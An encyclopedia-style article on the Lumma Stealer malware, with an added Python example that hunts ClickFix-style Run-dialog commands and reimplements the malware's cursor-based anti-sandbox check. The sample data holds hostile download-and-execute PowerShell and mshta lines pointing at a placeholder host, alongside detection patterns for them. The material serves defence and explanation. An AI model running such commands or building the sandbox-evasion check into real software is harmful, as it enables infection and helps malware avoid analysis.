Lumma Stealer
| Lumma Stealer | |
|---|---|
| Alias | LummaC2 |
| Authors | "Shamel"[1] |
| Technical details | |
| Written in | C++, ASM |
Lumma Stealer (also known as LummaC2) is an information-stealing malware family sold on a malware-as-a-service (MaaS) basis and targeting Microsoft Windows.
Technical overview
Lumma Stealer is distributed by affiliates through a variety of campaigns, including phishing emails, malicious advertisements posing as legitimate software downloads, and compromised websites. It is frequently associated with fake CAPTCHA pages that instruct the victim to open the Windows Run dialog and paste a command the page has placed on the clipboard, so that the victim launches the loader themselves.[2] Once running, it steals data from web browsers, cryptocurrency wallets and chat applications, as well as user files.[3] The collected data is sent to a set of hardcoded command-and-control servers; if none of them responds, the malware falls back to Telegram, Dropbox and Steam to recover working server addresses.[4]
Lumma Stealer uses multiple layers of code obfuscation and employs process hollowing, injecting its payload into a legitimate process so that its activity appears under a trusted program name, to evade detection. To defeat automated sandboxes, it delays detonation until it has observed enough human-like activity: it samples the cursor position over time and checks the geometry of the resulting movement before proceeding.[5] Rather than calling the documented Windows API functions exported by ntdll, it issues direct system calls, which bypasses the user-mode API hooks that many security products rely on.[6]
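The fake-CAPTCHA (ClickFix) delivery and the cursor-geometry anti-sandbox check described above lend themselves to two small worked examples. Both are added here for illustration and are not code from the Lumma operators, from any of the cited vendors, or from this article's sources; the indicator patterns, the registry sample and the cursor traces are constructed for the example. The first function set scans the `RunMRU` registry key, where Explorer records what was typed into the Run dialog, for commands with ClickFix characteristics; the second implements the reported anti-sandbox test (five samples, all positions distinct, every turn between consecutive movement vectors under 45 degrees) and treats those thresholds as the example's own assumptions rather than constants of every build.

```python
import math
import re
import time
from typing import Callable, Dict, List, Sequence, Tuple

# ---------------------------------------------------------------------------
# Part 1: hunting ClickFix-style Run-dialog commands in RunMRU
# ---------------------------------------------------------------------------

# Indicator set is this example's assumption, not a list from the article or a vendor.
INDICATORS = {
    "mshta_remote": re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I),
    "ps_encoded": re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I),
    "ps_hidden_window": re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*\s-w(indowstyle)?\s+hidden\b", re.I),
    "download_and_exec": re.compile(
        r"\b(iwr|invoke-webrequest|curl|wget)\b.*\b(iex|invoke-expression)\b", re.I),
    "robot_comment": re.compile(r"#.*(not a robot|captcha|verif)", re.I),
}

# Constructed HKCU\...\Explorer\RunMRU values (not from a real host). Explorer stores
# each command with a trailing "\1" and keeps most-recent-first order in MRUList.
SAMPLE_RUNMRU: Dict[str, str] = {
    "MRUList": "edcba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -ep bypass -c \"iwr http://example.invalid/v.txt | iex\""
         " # \u2705 I am not a robot - reCAPTCHA Verification ID: 3910\\1",
    "c": "mshta https://example.invalid/verify.hta\\1",
    "d": "cmd /c calc\\1",
    "e": "powershell -NoP -W Hidden -enc QQBBAGEAYQA=\\1",  # placeholder base64
}


def parse_runmru(values: Dict[str, str]) -> List[Tuple[str, str]]:
    """(value_name, command) pairs, most recent first, with the trailing "\\1" removed."""
    out = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        out.append((name, raw[:-2] if raw.endswith("\\1") else raw))
    return out


def classify_run_command(cmd: str) -> List[str]:
    """Names of the indicators matching one Run-dialog command."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def scan_runmru(values: Dict[str, str]) -> List[dict]:
    """Entries with at least one indicator; two or more are rated high."""
    findings = []
    for name, cmd in parse_runmru(values):
        hits = classify_run_command(cmd)
        if hits:
            findings.append({"name": name, "command": cmd, "indicators": hits,
                             "severity": "high" if len(hits) >= 2 else "medium"})
    return findings


def read_runmru_from_registry() -> Dict[str, str]:
    """Read the live key on a Windows host (winreg exists only there)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values: Dict[str, str] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            values[name] = str(data)
            i += 1
    return values


# ---------------------------------------------------------------------------
# Part 2: the cursor-geometry anti-sandbox check
# ---------------------------------------------------------------------------
Point = Tuple[int, int]
SAMPLES, INTERVAL_S, MAX_TURN_DEG = 5, 0.3, 45.0  # assumed parameters, see lead-in


def turn_angle_deg(v1: Point, v2: Point) -> float:
    """Angle between two movement vectors in degrees (180 if either is zero-length)."""
    n1, n2 = math.hypot(*v1), math.hypot(*v2)
    if n1 == 0 or n2 == 0:
        return 180.0
    cos_theta = (v1[0] * v2[0] + v1[1] * v2[1]) / (n1 * n2)
    return math.degrees(math.acos(max(-1.0, min(1.0, cos_theta))))


def cursor_looks_human(points: Sequence[Point], max_turn_deg: float = MAX_TURN_DEG) -> bool:
    """No repeated positions (idle sandbox) and no sharp turns (synthetic jitter)."""
    if len(points) < 3 or any(a == b for a, b in zip(points, points[1:])):
        return False
    vectors = [(b[0] - a[0], b[1] - a[1]) for a, b in zip(points, points[1:])]
    return all(turn_angle_deg(u, v) < max_turn_deg for u, v in zip(vectors, vectors[1:]))


def wait_for_human(sample: Callable[[], Point], max_rounds: int,
                   samples: int = SAMPLES, interval_s: float = INTERVAL_S) -> Tuple[bool, int]:
    """Re-sample the cursor until a round passes; returns (passed, rounds_used)."""
    for rnd in range(1, max_rounds + 1):
        points: List[Point] = []
        for _ in range(samples):
            points.append(sample())
            if interval_s:
                time.sleep(interval_s)
        if cursor_looks_human(points):
            return True, rnd
    return False, max_rounds


# Constructed cursor traces (not captured from a real machine).
HUMAN_PATH: List[Point] = [(100, 100), (130, 110), (165, 125), (205, 145), (250, 170)]
IDLE_PATH: List[Point] = [(640, 400)] * 5
ZIGZAG_PATH: List[Point] = [(100, 100), (120, 100), (120, 120), (100, 120), (100, 100)]


def make_sampler(*traces: Sequence[Point]) -> Callable[[], Point]:
    """Replay the given traces in order, one point per call (stands in for GetCursorPos)."""
    it = iter([p for trace in traces for p in trace])
    return lambda: next(it)


if __name__ == "__main__":
    for f in scan_runmru(SAMPLE_RUNMRU):
        print(f"[{f['severity']}] RunMRU {f['name']}: {f['indicators']}")
    for name, path in (("human", HUMAN_PATH), ("idle", IDLE_PATH), ("zigzag", ZIGZAG_PATH)):
        print(f"{name:7s} -> {'accepted' if cursor_looks_human(path) else 'rejected'}")
    print(wait_for_human(make_sampler(IDLE_PATH, HUMAN_PATH), max_rounds=3, interval_s=0))
```

On a real host, `scan_runmru(read_runmru_from_registry())` gives the triage result; the Run dialog is the one thing every ClickFix lure has in common, so `RunMRU` is worth collecting alongside PowerShell script-block logs. The second half shows why a sandbox that leaves the cursor idle, or jerks it around at random, never reaches the payload: the check is cheap for the malware and only a sandbox that synthesises smooth, curved cursor movement will pass it.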
History
Lumma is believed to have first appeared on cybercrime forums in 2022.[7]
Between March and May 2025, Microsoft identified more than 394,000 Windows computers infected with Lumma.[8] In 2025, Lumma was the second most frequently uploaded sample on ANY.RUN and the third on MalwareBazaar.[9][10] In May 2025, Microsoft announced that, acting on a US court order and in coordination with law enforcement, it had seized or blocked roughly 2,300 domains that formed the backbone of Lumma's infrastructure.[11] Although the operators have since resumed activity, the takedown is believed to have damaged their reputation among criminal customers.[12]
References
- ^ "The Rise of MaaS & Lumma Info Stealer". Darktrace. Retrieved 2025-07-11.
- ^ "Behind the CAPTCHA: A Clever Gateway of Malware".
- ^ "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer". Microsoft Security Blog. 2025-05-21. Retrieved 2025-07-11.
- ^ Cybereason Security Services Team. "Your Data Is Under New Lummanagement: The Rise of LummaStealer". Cybereason. Retrieved 2025-07-11.
- ^ akerr (2023-11-20). "Analyzing LummaC2 stealer's novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection". Outpost24. Retrieved 2025-07-11.
- ^ "A Deep Dive Into Malicious Direct Syscall Detection". Palo Alto Networks Blog. 2024-02-13. Retrieved 2025-07-11.
- ^ "Lumma Stealer Is Out… of Business!". Bitsight. Retrieved 2025-07-11.
- ^ Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
- ^ "Malware Trends Tracker". ANY.RUN. Retrieved 2025-07-11.
- ^ "The Spamhaus Project". www.spamhaus.org. Retrieved 2025-07-11.
- ^ Masada, Steven (2025-05-21). "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues. Retrieved 2025-07-11.
- ^ "LummaC2 Fractures as Acreed Malware Becomes Top Dog". Dark Reading. Retrieved 2025-07-11.